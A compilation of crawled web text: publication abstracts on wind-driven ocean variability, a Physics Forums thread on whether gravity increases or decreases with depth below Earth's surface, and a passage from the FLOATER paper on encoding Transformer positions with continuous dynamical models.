bifurcation tree is sketched out for increasingly complex models for both the wind-driven and the thermohaline circulation. Sushama L, Ghil M, Ide K. Spatio-temporal variability in a mid-latitude ocean basin subject to periodic wind forcing. Atmosphere-ocean. 2007;45 (4) :227–250.Abstract The mid-latitude ocean's response to time-dependent zonal wind-stress forcing is studied using a reduced-gravity, 1.5-layer, shallow-water model in two rectangular ocean basins of different sizes. The small basin is 1000 km $\times$ 2000 km and the larger one is 3000 km $\times$ 2010 km; the aspect ratio of the larger basin is quite similar to that of the North Atlantic between 20$\deg$N and 60$\deg$N. The parameter dependence of the model solutions and their spatio-temporal variability subject to time-independent wind stress forcing serve as the reference against which the results for time-dependent forcing are compared. For the time-dependent forcing case, three zonal-wind profiles that mimic the seasonal cycle are considered in this study: (1) a fixed-profile wind-stress forcing with periodically varying intensity; (2) a wind-stress profile with fixed intensity, but north–south migration of the mid-latitude westerly wind maximum; and (3) a north–south migrating profile with periodically varying intensity. Results of the small-basin simulations show the intrinsic variability found for time-independent forcing to persist when the intensity of the wind forcing varies periodically. It thus appears that the physics behind the upper ocean's variability is mainly controlled by internal dynamics, although the solutions’ spatial patterns are now more complex, due to the interaction between the external and internal modes of variability. The north–south migration of wind forcing, however, does inhibit the inertial recirculation; its suppression increases with the amplitude of north–south migration in the wind-stress forcing. Model solutions in the larger rectangular basin and at smaller viscosity exhibit more realistic recirculation gyres, with a small meridional-to-zonal aspect ratio, and an elongated eastward jet; the low-frequency variability of these solutions is dominated by periodicities of 14 and 6–7 years. Simulations performed in this setting with a wind-stress profile that involves seasonal variations of realistic amplitude in both the intensity and the position of the atmospheric jet show the seven-year periodicity in the oceanic circulation to be robust. The intrinsic variability is reinforced by the periodic variations in the jet's intensity and weakened by periodic variations in the meridional position; the two effects cancel, roughly speaking, thus preserving the overall characteristics of the seven-year mode. Kravtsov S, Berloff P, Dewar WK, Ghil M, McWilliams JC. Dynamical origin of low-frequency variability in a highly nonlinear midlatitude coupled model. Journal of Climate. 2006;19 (24).Abstract A novel mechanism of decadal midlatitude coupled variability, which crucially depends on the nonlinear dynamics of both the atmosphere and the ocean, is presented. The coupled model studied involves quasigeostrophic atmospheric and oceanic components, which communicate with each other via a constant-depth oceanic mixed layer. A series of coupled and uncoupled experiments show that the decadal coupled mode is active across parameter ranges that allow the bimodality of the atmospheric zonal flow to coexist with oceanic turbulence. The latter is most intense in the regions of inertial recirculation (IR). Bimodality is associated with the existence of two distinct anomalously persistent zonal-flow modes, which are characterized by different latitudes of the atmospheric jet stream. The IR reorganizations caused by transitions of the atmosphere from its high- to low-latitude state and vice versa create sea surface temperature anomalies that tend to induce transition to the opposite atmospheric state. The decadal–interdecadal time scale of the resulting oscillation is set by the IR adjustment; the latter depends most sensitively on the oceanic bottom drag. The period T of the nonlinear oscillation is 7–25 yr for the range of parameters explored, with the most realistic parameter values yielding T \approx 20 yr. Aside from this nonlinear oscillation, an interannual Rossby wave mode is present in all coupled experiments. This coupled mode depends neither on atmospheric bimodality, nor on ocean eddy dynamics; it is analogous to the mode found previously in a channel configuration. Its time scale in the model with a closed ocean basin is set by cross-basin wave propagation and equals 3–5 yr for a basin width comparable with the North Atlantic.
2020-08-10 03:07:55
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.501649796962738, "perplexity": 2211.6186467709267}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439738603.37/warc/CC-MAIN-20200810012015-20200810042015-00542.warc.gz"}
https://www.physicsforums.com/threads/what-comprises-the-mass-of-the-earth.341280/
# What comprises the mass of the earth? 1. Sep 29, 2009 ### Jsimonetti My question is as follows: Do we (and all stationary objects on the surface of the earth) make up for the overall mass of the earth? If not why? In an attempt to apply my understanding of this matter, I would wonder if I stand outside and jump, are my legs creating force on the earth, pushing the earth downwards (even a small amount), or since I am part of the mass of the earth, does the earth simply absorb the energy from my legs? 2. Sep 29, 2009 ### Pengwuino Yes, you help make up the mass of the Earth. When you jump, you do push the Earth downwards. 3. Sep 29, 2009 ### Jsimonetti Thank you! I can then assume that If I lay on the ground, and rest a 1kg weight on my chest, that the 1kg weight has only 1 force pulling it down, the force of the gravity of the earth, and not two forces, the gravitational force of the earth, and its gravitational attraction to the matter in my body. Is this also correct? 4. Sep 29, 2009 ### Pengwuino If you consider the mass of the earth and hte mass of your body as 2 different entities, the weight feels a gravitational force from the earth AND you since you create your own gravitational field. 5. Sep 29, 2009 ### Jsimonetti But gravity is determined by the mass of an object. If I am part of the mass of the earth, than surely, you would have to agree that the weight is acted upon by one force, the gravity of the earth. 6. Sep 29, 2009 ### Pengwuino Well, ok, let's just settle this. The Earth is $$m_1$$, you are $$m_2$$. If all there was in the universe was you, the earth, and the moon, the force of attraction on the moon is because of the Earth, $$m_1$$, and you, $$m_2$$. If the universe just encompassed you and the Earth, the gravitational field you would feel would be solely from the Earth, $$m_1$$. I believe I might have tossed some confusing info out there due to the original question. 7. Sep 29, 2009 ### D H Staff Emeritus Jsimonetti, you appear to have a common misperception of the gravitational force between two objects, namely that $$F=\frac{GmM}{r^2}$$ where F is the magnitude of the gravitational force, G is the universal gravitational constant, m and M are the masses of the two objects, and r is the distance between the centers of mass of the two objects. The above equation is of course Newton's law of universal gravitation. Newton's law of gravitation applies to point masses only. For a real object, one has to break things down to infinitesimally small objects to which Newton's law does apply. The gravitational force between two non-point masses is the vector sum of the gravitational forces amongst all pairs of infinitesimally small objects in the objects. In short, you have to do a double volume integral. It turns out that the gravitational force between a point mass and a mass with a spherical mass distribution is the same as that given by Newton's law of gravity. Newton himself developed the proof of this; it is called Newton's shell theorem. The planets in our solar system are very close to spherical objects, particularly when viewed from far, far away. Approximating them as point masses yields a very good model of the solar system. How about the problem at hand? On one hand you could laboriously compute the gravitational force by the earth+human system on some other object by means of this double integral approach. On the other hand, suppose you individually compute the gravitational force on the object by the earth and by the human. Add these two forces together and you will get the exact same answer as the laborious approach. Gravitational forces, like forces in general, are additive. 8. Sep 29, 2009 ### monty37 well this just crossed my brain.. the mass of earth as such without considering all the people on it would be less than its mass with people on it, but will the difference be negligible..dont you think if you remove earth of its whole population its mass would considerably reduce? 9. Sep 29, 2009 ### Jsimonetti Thank you for all the replies, they are enlightening. However this brings me to one more question: We are then attracted to the earth by the force equal to the sum of all the infinitesimally small particles that make up the earth. If I were to dig out a hole (lets say a labor intensive 7 foot cube) and stack this dirt next to the hole, the force of gravity pulling me down in a perpendicular direction would be less if I was standing at the bottom of the hole, than on the top of the pile, correct? 10. Sep 29, 2009 ### Staff: Mentor This is ridiculous, the mass of the earth is about 6E24 kg there are about 6E9 people each weighing on average far less than 100 kg for a total of less than 6E11 kg of people. So the earth is roughly 1E13 times greater mass than the mass of all of the people on the earth. In other words, that is about 0.00000000001% of the mass of the earth. The gravitational constant G is only known to a precision of about 0.0014% (http://www.aip.org/pnu/2000/split/pnu482-1.htm" [Broken]) and the mass of the earth is only known to about the same precision. So the mass of all of the people on earth could be added or subtracted millions of times over without any detectable difference to our most precise measurements. Last edited by a moderator: May 4, 2017 11. Sep 29, 2009 ### DaveC426913 Yes. What you want to explore is called Newton's Shell theorem. Let's simplify the setup. Pretend the Earth is a perfect sphere, 4,000,000 metres in radius. Three examples: a] Standing on its surface (0 metres depth), you will feel the full effect of a 4,000,000 metre radius sphere under you. b] In a small hole 2 metres below the surface of the Earth, you would feel the effect of a perfect sphere 3,999,998 metres in radius. You would feel no net gravitational pull from the 2 metre thick spherical shell that constitutes the entire surface layer of the Earth. c] In a small hole 1,000,000 metres below the surface of the Earth, you would feel the effect of a perfect sphere 3,000,000 metres in radius. You would feel no net gravitational effect from the 1,000,000 metre thick spherical shell that constitutes the upper layers of the Earth. d] In a small hole 3,999,998 metres below the surface (only 2 metres from the centre), you would feel the g-pull of a sphere only 2 metres in radius. You would feel no net gravitational effect from the 3,999,998 metre spherical shell above you. Last edited: Sep 29, 2009 12. Sep 29, 2009 ### D H Staff Emeritus No! DaveC, you implicitly assumed the Earth is of a constant density throughout. This absolutely is not the case for the Earth. The Earth's core is far denser than the material above it. This simplifying assumption leads to exactly the wrong answer for this specific yes/no question. A much better approach is to assume a radial mass distribution. I don't have time to go through the derivation now. I will do so later this evening if someone else hasn't already filled in the gaps. The bottom line is that gravitational acceleration will decrease with depth if $$\rho_s > \frac 2 3 \,\bar{\rho}$$ In English, the condition for gravitational acceleration to decrease with depth is that the density of the surface material must be more than 2/3 of the mean density of the Earth. The mean density of the Earth is 5515 kg/m3. 2/3 of this is 3677 kg/m3. Dirt varies in density from about 1200 to 2000 kg/m3, far less than the requisite 3677 kg/m3. Solid granite has a density of 2691 kg/m3, so gravitational acceleration will increase with depth even if you dig through solid granite. 13. Sep 29, 2009 ### mgb_phys This is even used practically. Searching for oil you measure the force of gravity on a weight, when you are over a buried oil reserve the force will be slightly less (because oil is less dense than rock). When you are building a telescope you also have to be careful about the difference between level as measured by a spirit level or plumb bob and straight up to the stars. Local gravity might be pulled off sightly to one side because of a nearby mountain or denser rock - like your pile of dirt - affecting the spirit level. 14. Sep 29, 2009 ### DaveC426913 Yes. I should have made it explicit. The poster wants to understand the principles involved. I see no reason to complicate the principles with messy reality, at least until the poster undestands the principles. But if you do want to be picky about reality, it's still perfectly true. It is still Newton's Shell Theorem. It's just that you need to factor in the varying density. Additonally, the poster's hole is only a few metres deep. While your factoring of the varying density will indeed change the numerical answer (which was not asked for), it will not change the principle of the answer. The person in the hole will still weigh less than the person standing above the hole. So, really, I'm not sure where you're coming from. 15. Sep 29, 2009 ### Staff: Mentor That is just the point, the person in the hole will weigh more, not less. There are two competing factors here, the person is closer to the center of the earth which tends to increase the gravitational attraction, and there is a smaller amount of matter in the sphere below the person which tends to decrease the gravitational attraction. If the density of the outer shell is less than 2/3 the average density in the sphere below (as is the case on the surface of the earth) then the closer distance effect wins and the gravity increases. Last edited: Sep 29, 2009 16. Sep 29, 2009 ### KingNothing We like to think of things as point masses when it comes to gravity. However, in reality, one could imagine the gravitational force of each individual atom as being a separate force. 17. Sep 29, 2009 ### D H Staff Emeritus Where I am coming from is that you are wrong. The person will weigh more at the bottom of the hole. You are right that the shell theorem still applies. Ignoring the rotation of the Earth and assuming the Earth has a spherical mass distribution (density depends only on distance from the center of the Earth), the gravitational acceleration experienced at some distance r from the center of the Earth is exactly that given by Newton's law of gravitation, $$a(r) = \frac {Gm(r)}{r^2}$$ where m(r) is the mass of that portion of the Earth inside a sphere of radius r centered at the center of the Earth. Suppose the Earth comprises an inner shell of mass surrounded by an outer shell. The inner shell has spherical mass distribution, mass m0, and radius r0. The outer shell is a spherical shell of constant density ρs. The mass of the part of the Earth within a sphere of radius r, Re>r>r0 is $$m(r) = m_0 + \frac 4 3 \pi \rho_s \left(r^3-r_0^{\,3}\right)$$ Denote the difference between the mass of the inner shell and a mass of the same volume but the density of the outer shell as Δm, $$\Delta m \equiv m_0 - \frac 4 3 \pi \rho_s r_0^{\,3}$$ With this, the mass m(r) becomes $$m(r) = \frac 4 3 \pi \rho_s r^3 + \Delta m$$ The gravitational acceleration at some point r within this outer shell is thus $$a(r) = \frac {Gm(r)}{r^2} = \frac 4 3 \pi G \rho_s r + \frac {G\Delta m}{r^2}$$ The gravitational acceleration will decrease/increase with depth if the derivative of the acceleration with respect to r is positive/negative. Differentiating, $$\frac{\partial a(r)}{\partial r} = \frac 4 3 \pi G \rho_s - 2 \frac {G\Delta m}{r^3}$$ The conditions for an decrease gravitational acceleration with respect to depth is $$\rho_s > 2 \frac {\Delta m}{4/3 \pi r^3}$$ Substituting $\Delta m = \left(m(r) - 4/3 \pi \rho_s r^3$ and simplifying, $$\rho_s > 2 \frac {\left(m(r)}{4/3 \pi r^3} - 2 \rho_s$$ The first term on the right hand side, $m(r)/(4/3\pi r^3)$ is the mean density of of that portion of the Earth inside a sphere of radius r. With this, $$\rho_s > \frac 2 3 \bar{\rho}$$ Two thirds of the mean density of the Earth is significantly greater than the density of granity (2.7 grams/cc) or even basalt (3.0 grams/cc). Gravitational acceleration increases with depth near the surface of the Earth. In fact, gravitational acceleration increases all the way down to the mantle/crust boundary. It then decreases a bit with increasing depth but then starts increasing again, reaching a maximum at the mantle/outer core boundary. The gravitational acceleration at the mantle/outer core boundary, 2,890 km below the surface, is greater than the gravitational acceleration at the Earth's surface. 18. Sep 29, 2009 ### DaveC426913 Got it. Conceded.
2017-12-17 23:47:47
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7244006991386414, "perplexity": 450.7053586672231}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-51/segments/1512948599156.77/warc/CC-MAIN-20171217230057-20171218012057-00145.warc.gz"}
https://deepai.org/publication/learning-to-encode-position-for-transformer-with-continuous-dynamical-model
DeepAI # Learning to Encode Position for Transformer with Continuous Dynamical Model We introduce a new way of learning to encode position information for non-recurrent models, such as Transformer models. Unlike RNN and LSTM, which contain inductive bias by loading the input tokens sequentially, non-recurrent models are less sensitive to position. The main reason is that position information among input units is not inherently encoded, i.e., the models are permutation equivalent; this problem justifies why all of the existing models are accompanied by a sinusoidal encoding/embedding layer at the input. However, this solution has clear limitations: the sinusoidal encoding is not flexible enough as it is manually designed and does not contain any learnable parameters, whereas the position embedding restricts the maximum length of input sequences. It is thus desirable to design a new position layer that contains learnable parameters to adjust to different datasets and different architectures. At the same time, we would also like the encodings to extrapolate in accordance with the variable length of inputs. In our proposed solution, we borrow from the recent Neural ODE approach, which may be viewed as a versatile continuous version of a ResNet. This model is capable of modeling many kinds of dynamical systems. We model the evolution of encoded results along position index by such a dynamical system, thereby overcoming the above limitations of existing methods. We evaluate our new position layers on a variety of neural machine translation and language understanding tasks, the experimental results show consistent improvements over the baselines. • 18 publications • 20 publications • 18 publications • 138 publications 09/28/2020 ### Improve Transformer Models with Better Relative Position Embeddings Transformer architectures rely on explicit position encodings in order t... 04/18/2021 ### Demystifying the Better Performance of Position Encoding Variants for Transformer Transformers are state of the art models in NLP that map a given input s... 04/18/2022 ### Dynamic Position Encoding for Transformers Recurrent models have been dominating the field of neural machine transl... 06/28/2020 ### Rethinking Positional Encoding in Language Pre-training How to explicitly encode positional information into neural networks is ... 11/08/2022 ### Word Order Matters when you Increase Masking Word order, an essential property of natural languages, is injected in T... 06/28/2020 ### Rethinking the Positional Encoding in Language Pre-training How to explicitly encode positional information into neural networks is ... 01/28/2021 ### Position, Padding and Predictions: A Deeper Look at Position Information in CNNs In contrast to fully connected networks, Convolutional Neural Networks (... ## 1 Introduction Transformer based models [20, 4, 22, 14, 7, 15] have become one of the most effective approaches to model sequence data of variable lengths. Transformers have shown wide applicability to many natural language processing (NLP) tasks such as language modeling [14], neural machine translation (NMT) [20], and language understanding [4] . Unlike traditional recurrent-based models (e.g., RNN or LSTM), Transformer utilizes a non-recurrent but self-attentive neural architecture to model the dependency among elements at different positions in the sequence, which leads to better parallelization using modern hardware and alleviates the vanishing/exploding gradient problem in traditional recurrent models. [23] prove that the design of self-attentive architecture leads to a family of permutation equivalence functions. Thus, for applications where the ordering of the elements matters, how to properly encode position information is crucial for Transformer based models. There have been many attempts to encode position information for the Transformer. In the original Transformer paper [20], a family of pre-defined sinusoidal functions was adapted to construct a set of embeddings for each position. These fixed position embeddings are then added to the word embeddings of the input sequence accordingly. To further construct these position embeddings in a more data-driven way, many recent Transformer variants such as [4, 9] include these embeddings as learnable model parameters in the training stage. This data-driven approach comes at the cost of the limitation of a fixed maximum length of input sequence and the computational/memory overhead of additional parameters, where is usually set to 512 in many applications, and is the dimension of the embeddings. [18] propose a relative position representation to reduce the number of parameters to by dropping the interactions between tokens with a distance greater than . In addition to just the input layer, [3] and [7] suggest that the injection of position information to every layer leads to even better performance for the Transformer. An ideal position encoding approach should satisfy the following three properties: 1. [nosep,leftmargin=1em,labelwidth=*,align=left] 2. Inductive: the ability to handle sequences longer than any sequence seen in the training time. 3. Data-Driven: the position encoding should be learnable from the data. 4. Parameter Efficient: number of trainable parameters introduced by the encoding should be limited to avoid increased model size, which could hurt generalization. In Table 1, we summarize some of the existing position encoding approaches in terms of these three properties. In this paper, we propose a new method to encode position with minimum cost. The main idea is to model position encoding as a continuous dynamical system, so we only need to learn the system dynamics instead of learning the embeddings for each position independently. By doing so, our method enjoys the best of both worlds – we bring back the inductive bias, and the encoding method is freely trainable while being parameter efficient. To enable training of this dynamical system with backpropagation, we adopt the recent progress in continuous neural network [1], officially called Neural ODE. In some generative modeling literature, it is also called the free-form flow model [5], so we call our model FLOw-bAsed TransformER (FLOATER). We highlight our contributions as follows: • [nosep,leftmargin=1em,labelwidth=*,align=left] • We propose FLOATER, a new position encoder for Transformer, which models the position information via a continuous dynamical model in a data-driven and parameter-efficient manner. • Due to the use of a continuous dynamic model, FLOATER can handle sequences of any length. This property makes inference more flexible. • With careful design, our position encoder is compatible with the original Transformer; i.e., the original Transformer can be regarded as a special case of our proposed position encoding approach. As a result, we are not only able to train a Transformer model with FLOATER from scratch but also plug FLOATER into most existing pre-trained Transformer models such as BERT, RoBERTa, etc. • We demonstrate that FLOATER consistent improvements over baseline models across a variety of NLP tasks ranging from machine translations, language understanding, and question answering. ## 2 Background and Related Work ### 2.1 Importance of Position Encoding for Transformer We use a simplified self-attentive sequence encoder to illustrate the importance of position encoding in the Transformer. Without position encoding, the Transformer architecture can be viewed as a stack of blocks containing a self-attentive and a feed-forward layer . By dropping the residual connections and layer normalization, the architecture of a simplified Transformer encoder can be represented as follows. Encode(x) =BN∘BN−1∘⋯∘B1(x), (1) Bn(x) =Fn∘An(x), (2) where , is the length of the sequence and is the dimension of the word embedding. and are the self-attentive and feed-forward layer in the -th block , respectively. Each row of can be regarded as a weighted sum of the value matrix , with the weights determined by similarity scores between the key matrix and query matrix as follows: A1(x)=Softmax(QK⊤√d)V, (3) Q=[q1,q2,...,qL]⊤,qi=Wqxi+bq,K=[k1,k2,...,kL]⊤,ki=Wkxi+bk,V=[v1,v2,...,vL]⊤,vi=Wvxi+bv, and are the weight and bias parameters introduced in the self-attentive function . The output of the feed-forward function used in the Transformer is also a matrix with rows. In particular, the -th row is obtained as follows. the i-th row of F1(x)=W2σ(W1xi+b1)+b2, (4) where and are the weights and biases of linear transforms, and is the activation function. It is not hard to see from ( 3) and (4) that both and are permutation equivalent. Thus, we can conclude that the entire function defined in (1) is also permutation equivalent, i.e., for any permutation matrix . This permutation equivalence property restricts the Transformer without position information from modeling sequences where the ordering of elements matters. ### 2.2 Position Encoding in Transformer As mentioned in Section 1, there are many attempts to inject position information in self-attentive components. Most of them can be described in the following form: Bn(x)=Fn∘An∘Φn(x), n∈{1,...,N}, (5) where is a position encoding function. [20] propose to keep and inject position information only at the input block with a family of pre-defined sinusoidal functions: , where ] is a position embedding matrix with the -th row corresponding to the -th position in the input sequence. In particular, the -th dimension of the -th row is defined as follows. p(1)i[j] =⎧⎨⎩sin(i⋅cjd)if j is even,cos(i⋅cj−1d)if j is odd, (6) where . [3] and [7] observe better performance by further injecting the position information at each block, i.e., as follows: p(n)i[j] =⎧⎨⎩sin(i⋅cjd)+sin(n⋅cjd)if j is even,cos(i⋅cj−1d)+cos(n⋅cj−1d)if j % is odd. (7) Note that for the above two approaches, position encoding functions are fixed for all the applications. Although no additional parameters are introduced in the model, both approaches are inductive and can handle input sequences of variable length. Many successful variants of pre-trained Transformer models, such as BERT [4] and RoBERTa [9], include the entire embedding matrix in as training parameters. As the number of training parameters needs to be fixed, the maximum length of a sequence, , is required to be determined before the training. Although it lacks the inductive property, this data-driven approach is found to be effective for many NLP tasks. Note that, unlike the fixed sinusoidal position encoding, there is no attempt to inject a learnable position embedding matrix at each block for Transformer due to a large number of additional parameters (). ## 3 FLOATER: Our Proposed Position Encoder We introduce our method in three steps. In the first step, we only look at one Transformer block, and describe how to learn the position representation driven by a dynamical system; in the second step, we show how to save parameters if we add position signals to every layer; lastly, we slightly change the architecture to save trainable parameters further and make FLOATER “compatible” with the original Transformer [20]. The compatibility means our model is a strict superset of the vanilla Transformer so that it can be initialized from the Transformer. ### 3.1 Position Encoding with Dynamical Systems Position representations in Transformer models are a sequence of vectors to be added to the sequence of the input representations {. Existing position encoding approaches either apply a fixed sinusoidal function to obtain , or include them as uncorrelated learnable parameters. Both of them fail to capture the dependency or dynamics among these position representations . In this paper, we propose to use a dynamical system to model these position representations; that is, there is a “latent force” denoted by that drives the changes from to . To encourage smoothness, we consider as the continuous version of the discrete sequence . In particular, our proposed continuous dynamical system is characterized as follows: p(t)=p(s)+∫tsh(τ,p(τ);θh)\difτ, 0≤s≤t<∞, (8) together with an initial vector , where is a neural network parameterized by and takes the previous state . Notice that the domain of is . The position sequence can be obtained by taking on a series of points : . One simple strategy is to set so that the points are equidistant, where is a hyperparameter (e.g., ). With this strategy, we are implicitly assuming the position signals evolve steadily as we go through each token in a sentence. In general, can be any monotonically increasing series, which allows us to extend our work to more applications where the elements in the sequence are not always observed with the same interval. More discussions about the applicability for this general setting is included in the Supplementary material. For the NLP applications discussed in this paper, we choose . Eq. (8) is equivalent to an ODE problem , which is guaranteed to have a unique solution under mild conditions [19]. We follow the efficient approach by [1] to calculate the gradients of with respect to the overall training loss, which allows us to include this parameterized dynamical position encoder into the end-to-end training of Transformer models. More details can be found in the Supplementary material. Our dynamical system (8) is quite flexible to admit the standard sinusoidal position encoding (6) as a special case: pi+1[j]−pi[j] (9) =⎧⎪⎨⎪⎩sin((i+1)⋅cjd)−sin(i⋅cjd)if j is evencos((i+1)⋅cj−1d)−cos(i⋅cj−1d)if j is odd =⎧⎪⎨⎪⎩∫i+1ic−jdcos(τ⋅cjd)\difτ if j is even∫i+1i−c−j−1dsin(τ⋅cj−1d)\difτ if j is odd, This indicates that for simple sinusoidal encoding, there exists a dynamical system which is also sinusoidal function. ### 3.2 Parameter Sharing among Blocks As mentioned in Section 2, injecting position information to each block for Transformer leads to better performance [3, 7] in some language understanding tasks. Our proposed position encoder FLOATER (8) can also be injected into each block. The idea is illustrated in Figure 1. Typically there are blocks in sequence-to-sequence Transformer and or blocks in BERT. We add a superscript to denote dynamics at -th block: p(n)(t)=p(n)(s)+∫tsh(n)(τ,p(n)(τ);θ(n)h)\difτ. As we can imagine, having different dynamical models for each block can introduce too many parameters and cause significant training overhead. Instead, we address this issue by sharing parameters across all the blocks, namely θ(1)h=θ(2)h=⋯=θ(N)h. (10) Note that (10) does not imply that all the are the same, as we will assign different initial values for each block, that is for . ### 3.3 Compatibility and Warm-start Training In this section, we change the way to add position encoding so that our FLOATER can be directly initialized from Transformer. As an example, we use the standard Transformer model, which has a fixed sinusoidal encoding at the input block and no position encoding at deeper levels. Note that this technique can be extended to other variants of Transformers with different position encoding methods, such as embedding matrix. We first examine the standard Transformer model, the query matrix at block- is \ThisStyle\stackengine−.1\LMpt$\SavedStyleq$\stretchto\scaleto\SavedStyle∼.5467.7OcFTS(n)i =W(n)q(xi+\ThisStyle\stackengine−.1\LMpt$\SavedStylep$\stretchto\scaleto\SavedStyle∼.5467.7OcFTS(n)i)+b(n)q, (11) where and are parameters in  (3); is the sinusoidal encoding; is the -th row of . Here we add a tilde sign to indicate the sinusoidal vectors. Formulas for and have a very similar form and are omitted for brevity. Now we consider the case of FLOATER, where new position encodings are added q(n)i =W(n)q(xi+pi)+b(n)q (12) =W(n)q(xi+\ThisStyle\stackengine−.1\LMpt$\SavedStylep$\stretchto\scaleto\SavedStyle∼.5467.7OcFTS(n)i)+b(n)qEq. (???)+W(n)q(p\definecolor[named]pgfstrokecolorrgb1,0,0\pgfsys@color@rgb@stroke100\pgfsys@color@rgb@fill100i−\ThisStyle\stackengine−.1\LMpt$\SavedStylep$\stretchto\scaleto\SavedStyle∼.5467.7OcFTS(n)\definecolor[named]pgfstrokecolorrgb1,0,0\pgfsys@color@rgb@stroke100\pgfsys@color@rgb@fill100i)Extra bias term depends on \definecolor[named]pgfstrokecolorrgb1,0,0\pgfsys@color@rgb@stroke100\pgfsys@color@rgb@fill100i =\ThisStyle\stackengine−.1\LMpt$\SavedStyleq$\stretchto\scaleto\SavedStyle∼.5467.7OcFTS(n)i+b(n)q,\definecolor[named]pgfstrokecolorrgb1,0,0\pgfsys@color@rgb@stroke100\pgfsys@color@rgb@fill100i. It is easy to see that the changing the position embedding from to is equivalent to adding a position-aware bias vector into each self-attentive layers . As a result, we can instead apply (8) to model the dynamics of . In particular, we have the following dynamical system: b(n)q(t)=b(n)q(0)+∫t0h(n)(τ,b(n)q(τ);θh)\difτ. (13) After that, we set . We can see that if and , then . This implies (12) degenerates to (11). Note that (13) has the same form as (8), except that we are now modeling the bias terms in (3). We will apply the same technique to and . To summarize, our model has a tight connection to the original Transformer: if we set all dynamical models to zero, which means , then our FLOATER model will be equivalent to the original Transformer with the sinusoidal encoding. The same trick also works for Transformer with position embedding such as BERT [4]. We strive to make our model compatible with the original Transformer due to the following reasons. First of all, the original Transformer is faster to train as it does not contain any recurrent computation; this is in contrast to our dynamical model (8), where the next position depends on the previous one . By leveraging the compatibility of model architecture, we can directly initialize FLOATER model from a pre-trained Transformer model checkpoint and then fine-tune for the downstream task for a few more epochs. By doing so, we enjoy all the benefits of our FLOATER model but still maintain an acceptable training budget. Likewise, for models such as BERT or Transformer-XL, we already have well-organized checkpoints out of the box for downstream tasks. These models are costly to train from scratch, and since our goal is to examine whether our proposed position representation method can improve over the original one, we decided to copy the weights layer by layer for attention as well as FFN layers, and randomly initialize the dynamical model . ## 4 Experimental Results In this section, we perform experiments to see if FLOATER can improve over the existing position encoding approaches for a given Transformer model on various NLP tasks. Thus, all the metrics reported in this paper are computed from a single (not ensemble) Transformer model over each evaluation NLP task. Albeit lower than top scores on the leaderboard, these metrics are able to reveal more clear signal to judge the effectiveness of the proposed position encoder. All our codes to perform experiments in this paper are based on the Transformer implementations in the fairseq [11] package. Implementation details can be found in the Supplementary material. Our experimental codes will be made publicly available. ### 4.1 Neural Machine Translation Neural Machine Translation (NMT) is the first application that demonstrates the superiority of a sequence-to-sequence Transformer model over conventional recurrent sequence models. We include the following three additive position encoders: . • [nosep,leftmargin=1em,labelwidth=*,align=left] • Data-driven FLOATER: is generated by our proposed continuous dynamical models with data-driven parameters described in (8). • Pre-defined sinusoidal position encoder: is constructed by a pre-defined function described in , which is proposed by [20] and extended by [3]. • Length-fixed position embedding: is included as learnable training parameters. This is first introduced by [20] and adopted in many variants of Transformer [4, 9]. To better demonstrate the parameter efficiency brought by FLOATER, for each above encoder, we also include two experimental settings: position encoder at all blocks or only at the input block (i.e., ). In Table 2, we present the BLEU scores on WMT14 Ee-De and En-Fr datasets with both Transformer-base and Transformer-large models described in [20]. Among all the data/model combinations, our proposed FLOATER at all blocks outperforms two other position encoders. On the other hand, we also observe that adding position encoders at all blocks yields better performance than only at the input block. While there is an exception in the fixed-length position embedding approach. We suspect that this phenomenon is due to over-fitting cased by learnable parameters introduced by this approach. In contrast, our proposed FLOATER is parameter efficient (more discussions in Section 4.3), so the performance can be improved by injecting the position encoder at all the blocks of Transformer without much additional overhead. ### 4.2 Language Understanding and Question Answering Pretrained Transformer models such as BERT and RoBERTa have become the key to achieving the state-of-the-art performance for various language understanding and question answering tasks. In this section, we want to evaluate the effectiveness of the proposed FLOATER on these tasks. In particular, we focus on three language understanding benchmark sets, GLUE [21], RACE [6] and SQuAD [17]. As mentioned in Section 3.3, FLOATER is carefully designed to be compatible with the existing Transformer models. Thus, we can utilize pretrained Transformer models to warm-start a FLOATER model easily to be used to finetune on these NLP tasks. In this paper, we download the same pre-trained RoBERTa model from the official repository as our pretrained Transformer model for all NLP tasks discussed in this section. GLUE Benchmark. This benchmark is commonly used to evaluate the language understanding skills of NLP models. Experimental results in Table 3 show that our FLOATER model outperforms RoBERTa in most datasets, even though the only difference is the choice of positional encoding. RACE benchmark Similar to the GLUE benchmark, the RACE benchmark is another widely used test suit for language understanding. Compared with GLUE, each item in RACE contains a significantly longer context, which we believe requires more important to grasp the accurate position information. Like in GLUE benchmark, we finetune the model from the same pretrained RoBERTa checkpoint. We keep the hyperparameters, such as batch size and learning rate, to also be the same. Table 4 shows the experimental results. We again see consistent improvement of FLOATER across all subtasks. SQuAD benchmark SQuAD benchmark [17, 16] is another challenging task to evaluate the question answering skills of NLP 